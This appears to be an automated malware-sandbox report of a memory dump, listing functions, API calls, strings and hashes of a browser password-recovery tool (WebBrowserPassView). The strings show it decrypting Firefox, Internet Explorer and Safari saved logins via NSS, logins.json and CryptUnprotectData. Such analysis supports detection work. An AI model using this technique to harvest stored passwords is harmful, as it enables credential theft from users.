Part of subcall function 00407F9A: CloseHandle.KERNEL32(?), ref: 00408021
Part of subcall function 00407F9A: CloseClipboard.USER32 ref: 00408035

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
String ID:
API String ID: 2633007058-0
Opcode ID: 4c5b32fbc5962dd3ec3e64213f950012bbb2cd8fcd34be4f9706afab4c79e70d
Instruction ID: d4411bd4de1fade650879fa69a29e8aba7a0aa0f0e0d1894cd1391532f6ebd18
Opcode Fuzzy Hash: 4c5b32fbc5962dd3ec3e64213f950012bbb2cd8fcd34be4f9706afab4c79e70d
Instruction Fuzzy Hash: 4CF0A4357003006BEA3027359C0EF9B375DDB80714F00453AF852A65D3EE79E8898568

Uniqueness

Uniqueness Score: -1.00%

Function 004083A1, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
Instruction ID: e5ecc73df534455334d47becca92420b288d3786a246e23e5c2a841cda36e69b
Opcode Fuzzy Hash: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
Instruction Fuzzy Hash: 17C08C329112208BDB11AB08FE0A7CD72989B0B727F014077E802A2252C7F848048BBC

Uniqueness

Uniqueness Score: -1.00%

Function 00402316, Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 282COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040233E
_wcsicmp.MSVCRT ref: 0040236E
_wcsicmp.MSVCRT ref: 0040239B
_wcsicmp.MSVCRT ref: 004023C8

Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75

memset.MSVCRT ref: 0040276C
memcpy.MSVCRT ref: 004027A1

Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD

memcpy.MSVCRT ref: 004027FD
LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040285B
FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040286A

Strings

n, xrefs: 0040268C
!, xrefs: 00402662
w, xrefs: 00402615
z, xrefs: 0040269A
u, xrefs: 0040258A
', xrefs: 00402514
F, xrefs: 004024E3
8, xrefs: 004025D7
H, xrefs: 00402418
L, xrefs: 00402726
b, xrefs: 00402434
#, xrefs: 0040270A
0, xrefs: 0040254B
@, xrefs: 00402670
t, xrefs: 00402757
t, xrefs: 00402734
u, xrefs: 0040251B
n, xrefs: 004026CB
>, xrefs: 00402426
q, xrefs: 004025EC
/, xrefs: 0040261C
$, xrefs: 004026D9
=, xrefs: 0040265B
O, xrefs: 0040249D
), xrefs: 004026E7
&, xrefs: 00402449
}, xrefs: 0040241F
X, xrefs: 00402742
\, xrefs: 0040264D
server, xrefs: 0040232A
K, xrefs: 00402677
>, xrefs: 00402411
I, xrefs: 00402530
com.apple.Safari, xrefs: 00402771
g, xrefs: 00402457
A, xrefs: 004024AB
{, xrefs: 004024C0
y, xrefs: 004025A6
Data, xrefs: 004023BD
h, xrefs: 004025FA
Path, xrefs: 00402363
`, xrefs: 004025DE
a, xrefs: 0040262A
~, xrefs: 004026B6
S, xrefs: 0040260E
y, xrefs: 0040248F
2, xrefs: 004026BD
H, xrefs: 0040240A
t, xrefs: 00402669
&, xrefs: 00402703
^, xrefs: 0040273B
Account, xrefs: 00402390
K, xrefs: 004024DC
com.apple.WebKit2WebProcess, xrefs: 00402793

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
API String ID: 462158748-1134094380
Opcode ID: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
Instruction ID: 2d0d0591d6411435ed5b4a397348faa82e1f821ad6e98c1f3977ba2ad668a768
Opcode Fuzzy Hash: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
Instruction Fuzzy Hash: FBF1F2218087E9C9DB32C7788C097DEBE655B23324F0443D9D1E87A2D2D7B94B85CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0040AA82, Relevance: 59.8, APIs: 27, Strings: 7, Instructions: 275stringCOMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 0040AA9A
_wcsicmp.MSVCRT ref: 0040AAAF
_wcsnicmp.MSVCRT ref: 0040AAC9
_wcsnicmp.MSVCRT ref: 0040AADD
wcslen.MSVCRT ref: 0040AAEE
_wcsicmp.MSVCRT ref: 0040AB10
memset.MSVCRT ref: 0040AB55
wcscpy.MSVCRT ref: 0040AB62
wcslen.MSVCRT ref: 0040AB83
wcslen.MSVCRT ref: 0040AB9B
_wcsicmp.MSVCRT ref: 0040ABE0
_wcsicmp.MSVCRT ref: 0040ABF3
_wcsnicmp.MSVCRT ref: 0040AC0A
memset.MSVCRT ref: 0040AC50
wcschr.MSVCRT ref: 0040AC58
wcslen.MSVCRT ref: 0040AC60
wcscpy.MSVCRT ref: 0040AC7E
wcschr.MSVCRT ref: 0040AC8C
_wcsnicmp.MSVCRT ref: 0040ACBC
memset.MSVCRT ref: 0040ACF0
strlen.MSVCRT ref: 0040ACF6
memcpy.MSVCRT ref: 0040AD12
strchr.MSVCRT ref: 0040AD27
memset.MSVCRT ref: 0040AD51
memset.MSVCRT ref: 0040AD66
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040AD87
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040AD9A

Strings

https://, xrefs: 0040AAD7
wininetcachecredentials, xrefs: 0040ABD7, 0040ABDC, 0040ABEF
ftp://, xrefs: 0040AC04
:stringdata, xrefs: 0040AB0A
internet explorer, xrefs: 0040AA8E, 0040AA93, 0040AAAB
http://, xrefs: 0040AAC3
dpapi:, xrefs: 0040ACB6

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
API String ID: 2787044678-1843504584
Opcode ID: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
Instruction ID: f322a3b8e7f5a6d162087a7bfffa82d5495360e728e73a59fe9151b9b78652c6
Opcode Fuzzy Hash: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
Instruction Fuzzy Hash: 8191B271500219ABEF20DF55CC45FEF776DAF91314F01046AF948A7181EA3CEDA48B69

Uniqueness

Uniqueness Score: -1.00%

Function 004136DC, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00413709
GetDlgItem.USER32 ref: 00413715
GetWindowLongW.USER32(00000000,000000F0), ref: 00413724
GetWindowLongW.USER32(?,000000F0), ref: 00413730
GetWindowLongW.USER32(00000000,000000EC), ref: 00413739
GetWindowLongW.USER32(?,000000EC), ref: 00413745
GetWindowRect.USER32 ref: 00413757
GetWindowRect.USER32 ref: 00413762
MapWindowPoints.USER32 ref: 00413776
MapWindowPoints.USER32 ref: 00413784
GetDC.USER32 ref: 004137BD
wcslen.MSVCRT ref: 004137FD
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0041380E
ReleaseDC.USER32 ref: 0041385B
_snwprintf.MSVCRT ref: 0041391E
SetWindowTextW.USER32(?,?), ref: 00413932
SetWindowTextW.USER32(?,00000000), ref: 00413950
GetDlgItem.USER32 ref: 00413986
GetWindowRect.USER32 ref: 00413996
MapWindowPoints.USER32 ref: 004139A4
GetClientRect.USER32 ref: 004139BB
GetWindowRect.USER32 ref: 004139C5
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00413A0B
GetClientRect.USER32 ref: 00413A15
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00413A4D

Strings

STATIC, xrefs: 004138BD
EDIT, xrefs: 004138F3
%s:, xrefs: 00413913

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
Instruction ID: eaed71e83b935c0691042ece96cd3f4181ba93c5b62309cd5e6c1ba419c0f7d3
Opcode Fuzzy Hash: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
Instruction Fuzzy Hash: 8AB1CE71108701AFDB21DFA8C985A6BBBF9FB88704F004A2EF59582261DB75E904CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0040109F, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 004010F7
ChildWindowFromPoint.USER32 ref: 00401109
GetDlgItem.USER32 ref: 0040113F
ChildWindowFromPoint.USER32 ref: 0040114C
GetDlgItem.USER32 ref: 0040117A
ChildWindowFromPoint.USER32 ref: 0040118C
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
LoadCursorW.USER32(00000000,00000067), ref: 0040119E
SetCursor.USER32(00000000,?,?), ref: 004011A5
GetDlgItem.USER32 ref: 004011C6
ChildWindowFromPoint.USER32 ref: 004011D3
GetDlgItem.USER32 ref: 004011ED
SetBkMode.GDI32(?,00000001), ref: 004011F9
SetTextColor.GDI32(?,00C00000), ref: 00401207
GetSysColorBrush.USER32(0000000F), ref: 0040120F
GetDlgItem.USER32 ref: 00401230
EndDialog.USER32(?,?), ref: 00401265
DeleteObject.GDI32(?), ref: 00401271
GetDlgItem.USER32 ref: 00401296
ShowWindow.USER32(00000000), ref: 0040129F
GetDlgItem.USER32 ref: 004012AB
ShowWindow.USER32(00000000), ref: 004012AE
SetDlgItemTextW.USER32 ref: 004012BF
SetWindowTextW.USER32(?,WebBrowserPassView), ref: 004012CD
SetDlgItemTextW.USER32 ref: 004012E5
SetDlgItemTextW.USER32 ref: 004012F6

Strings

WebBrowserPassView, xrefs: 004012C5

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: WebBrowserPassView
API String ID: 829165378-2171583229
Opcode ID: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
Instruction ID: da1635bf63897f0d85a147e608c4a0468d220b7f7222c61bbc2b07ca64c81474
Opcode Fuzzy Hash: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
Instruction Fuzzy Hash: 4751BF34500B08EBDF22AF60CC45E6E7BB5FB04341F104A3AF952A65F1C7B9A950EB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040716C, Relevance: 42.2, APIs: 11, Strings: 13, Instructions: 221COMMON

Download Yara Rule

APIs

Part of subcall function 0040AE5E: GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
Part of subcall function 0040AE5E: CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC

Part of subcall function 0040AF0C: _wcsicmp.MSVCRT ref: 0040AF46

memset.MSVCRT ref: 004071FD
memset.MSVCRT ref: 00407212
_wtoi.MSVCRT ref: 00407306
_wcsicmp.MSVCRT ref: 0040731A
memset.MSVCRT ref: 0040733B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?), ref: 0040736F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00407386
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040739D
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073B4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073CB

Part of subcall function 00407150: _wtoi64.MSVCRT ref: 00407154

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073E2

Part of subcall function 00406FCE: memset.MSVCRT ref: 00406FF4
Part of subcall function 00406FCE: memset.MSVCRT ref: 00407008
Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
Part of subcall function 00406FCE: strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
Part of subcall function 00406FCE: wcscpy.MSVCRT ref: 0040709D
Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD

Strings

{@, xrefs: 00407187
hostname, xrefs: 0040721A
timeLastUsed, xrefs: 00407275
timePasswordChanged, xrefs: 00407282
encryptedUsername, xrefs: 00407227
null, xrefs: 00407312
encryptedPassword, xrefs: 00407234
usernameField, xrefs: 00407241
timesUsed, xrefs: 0040728F
passwordField, xrefs: 0040724E
timeCreated, xrefs: 00407268
logins, xrefs: 004071A3
httpRealm, xrefs: 0040725B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$memset$strcpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$logins$null$passwordField$timeCreated$timeLastUsed$timePasswordChanged$timesUsed$usernameField${@
API String ID: 249851626-1964116028
Opcode ID: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
Instruction ID: c3ecdf3b596e70815539cea729ffc079dd9e4b065ea23c8e33f814b0aa12875c
Opcode Fuzzy Hash: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
Instruction Fuzzy Hash: 48717FB1D40219AEEF10EBA2DC82DEEB778EF40318F1041BBB514B61D1DA785E548F69

Uniqueness

Uniqueness Score: -1.00%

Function 004113C8, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 0041140D
GetDlgItem.USER32 ref: 00411425
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00411443
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0041144F
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00411457
memset.MSVCRT ref: 0041147E
memset.MSVCRT ref: 004114A0
memset.MSVCRT ref: 004114B9
memset.MSVCRT ref: 004114CD
memset.MSVCRT ref: 004114E7
memset.MSVCRT ref: 004114FC
GetCurrentProcess.KERNEL32 ref: 00411504
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00411527
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00411559
memset.MSVCRT ref: 004115AC
GetCurrentProcessId.KERNEL32 ref: 004115BA
memcpy.MSVCRT ref: 004115E8
wcscpy.MSVCRT ref: 0041160B
_snwprintf.MSVCRT ref: 0041167A
SetDlgItemTextW.USER32 ref: 00411692
GetDlgItem.USER32 ref: 0041169C
SetFocus.USER32(00000000), ref: 004116A3

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0041166F
{Unknown}, xrefs: 00411492

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
Instruction ID: 77b13c0c11c75301577e42814f96b51b4b1d428f570956a2458bc96a91f7f52b
Opcode Fuzzy Hash: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
Instruction Fuzzy Hash: A17193B280021CBFEF219B51DD45EDA376DEB49355F04407BF608A2162EB79DE848F68

Uniqueness

Uniqueness Score: -1.00%

Function 00411760, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411781
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
memset.MSVCRT ref: 004117F1
wcslen.MSVCRT ref: 004117FE
wcslen.MSVCRT ref: 0041180D
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 004118CC
GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 004118D8

Part of subcall function 00406B51: memset.MSVCRT ref: 00406B72
Part of subcall function 00406B51: memset.MSVCRT ref: 00406BBF
Part of subcall function 00406B51: RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
Part of subcall function 00406B51: wcscpy.MSVCRT ref: 00406D07
Part of subcall function 00406B51: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
Part of subcall function 00406B51: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62

Strings

nss3.dll, xrefs: 004117F9, 00411821
PK11_Authenticate, xrefs: 004118C2
NSS_Init, xrefs: 00411889
NSS_Shutdown, xrefs: 00411892
PK11SDR_Decrypt, xrefs: 004118CE
PK11_GetInternalKeySlot, xrefs: 0041189E
PK11_CheckUserPassword, xrefs: 004118B6
PK11_FreeSlot, xrefs: 004118AA

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 2554026968-4029219660
Opcode ID: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
Instruction ID: 97ddbdf8ae905254a000a89cdfb80c97087349b9056a3f7eb9cac2f120fabdad
Opcode Fuzzy Hash: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
Instruction Fuzzy Hash: D2419271940308ABDB20AF61CC85E9AB7F8FF58344F10486FE295D3151EBB8D9848B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00407991, Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 259COMMON

Download Yara Rule

APIs

Part of subcall function 00411760: memset.MSVCRT ref: 00411781
Part of subcall function 00411760: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
Part of subcall function 00411760: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
Part of subcall function 00411760: memset.MSVCRT ref: 004117F1
Part of subcall function 00411760: wcslen.MSVCRT ref: 004117FE
Part of subcall function 00411760: wcslen.MSVCRT ref: 0041180D
Part of subcall function 00411760: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0

memset.MSVCRT ref: 004079D1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
memset.MSVCRT ref: 00407A23
memset.MSVCRT ref: 00407A3B
memset.MSVCRT ref: 00407A53
memset.MSVCRT ref: 00407A6B
memset.MSVCRT ref: 00407A83
wcslen.MSVCRT ref: 00407A8E
wcslen.MSVCRT ref: 00407A9C
wcslen.MSVCRT ref: 00407ACB
wcslen.MSVCRT ref: 00407AD9
wcslen.MSVCRT ref: 00407B08
wcslen.MSVCRT ref: 00407B16
wcslen.MSVCRT ref: 00407B45
wcslen.MSVCRT ref: 00407B53
wcslen.MSVCRT ref: 00407B82
wcslen.MSVCRT ref: 00407B90
SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254

Part of subcall function 0040744D: memset.MSVCRT ref: 0040748C
Part of subcall function 0040744D: memset.MSVCRT ref: 0040750B
Part of subcall function 0040744D: memset.MSVCRT ref: 00407520

Strings

logins.json, xrefs: 00407B89, 00407B9E
signons2.txt, xrefs: 00407AD2, 00407AE7
signons.txt, xrefs: 00407A95, 00407AAA
signons.sqlite, xrefs: 00407B4C, 00407B61
signons3.txt, xrefs: 00407B0F, 00407B24

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memset$AddressProc$CurrentDirectory$LibraryLoad$AttributesByteCharFileHandleModuleMultiWidewcscatwcscpy
String ID: logins.json$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3287676187-2852686199
Opcode ID: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
Instruction ID: 7d0a504a01980ca961e130c4bf0e7e2836c0561e9ae5ad9b50c10663cf81d5b6
Opcode Fuzzy Hash: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
Instruction Fuzzy Hash: 1F91947180811DABEF11EF51DC41A9E77B8FF44319F1004ABF908E2191EB79AA548B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00411158, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 171COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041117B
wcslen.MSVCRT ref: 00411183
wcslen.MSVCRT ref: 0041118F
wcscpy.MSVCRT ref: 00411206
wcscpy.MSVCRT ref: 00411217
memset.MSVCRT ref: 00411230
memset.MSVCRT ref: 00411245
_snwprintf.MSVCRT ref: 0041125F
memset.MSVCRT ref: 0041129E
wcslen.MSVCRT ref: 004112AE
wcslen.MSVCRT ref: 004112BC
wcscpy.MSVCRT ref: 00411272

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

wcscpy.MSVCRT ref: 00411303
memset.MSVCRT ref: 00411332
memset.MSVCRT ref: 00411347
_snwprintf.MSVCRT ref: 00411363
wcscpy.MSVCRT ref: 00411376

Strings

General, xrefs: 00411211
Profile%d, xrefs: 0041124B, 00411355
Path, xrefs: 0041138B
IsRelative, xrefs: 004113A6
profiles.ini, xrefs: 00411188, 004111A4

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
String ID: General$IsRelative$Path$Profile%d$profiles.ini
API String ID: 3014334669-2600475665
Opcode ID: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
Instruction ID: c42e31a804922eed0ec5ba890dd8b4603cdc71837868ac6ae30ebb97505d8267
Opcode Fuzzy Hash: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
Instruction Fuzzy Hash: 7D51557290122CAAEB20EB55CD45FDEB7BCAF55344F1040E7B508A2151EF789B848F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB6D, Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 274windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B5D4: LoadMenuW.USER32 ref: 0040B5DC

SetMenu.USER32(?,00000000), ref: 0040EC7A
CreateStatusWindowW.COMCTL32(50000000,Function_0004552C,?,00000101), ref: 0040EC95
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040ECAD
GetModuleHandleW.KERNEL32(00000000), ref: 0040ECBC
LoadImageW.USER32 ref: 0040ECC9
CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040ECF3
GetModuleHandleW.KERNEL32(00000000), ref: 0040ED00
CreateWindowExW.USER32 ref: 0040ED27
memcpy.MSVCRT ref: 0040EDEF
ShowWindow.USER32(?,?), ref: 0040EE25
GetFileAttributesW.KERNEL32(00453928), ref: 0040EE56
GetTempPathW.KERNEL32(00000104,00453928), ref: 0040EE66
wcslen.MSVCRT ref: 0040EE6D
wcslen.MSVCRT ref: 0040EE7B
RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040EEC8
SendMessageW.USER32(?,00000404,00000002,?), ref: 0040EF02
SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040EF15

Part of subcall function 00403D7A: wcslen.MSVCRT ref: 00403D97
Part of subcall function 00403D7A: SendMessageW.USER32(?,00001061,?,?), ref: 00403DBB

Strings

commdlg_FindReplace, xrefs: 0040EEC3
report.html, xrefs: 0040EE74, 0040EE8C
SysListView32, xrefs: 0040ED21
/nosaveload, xrefs: 0040EDAC

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Message$SendWindow$Createwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterShowStatusTempToolbarmemcpy
String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
API String ID: 1225797202-2103577948
Opcode ID: 9d98e6f2fbb5c69645150cf5077508ab95bdd3e46f00e280708d5f032f5596ec
Instruction ID: 8c9b3575536fccf7ef0877cb0e8d9f23cb5666ec72f10922821c14b88f39767b
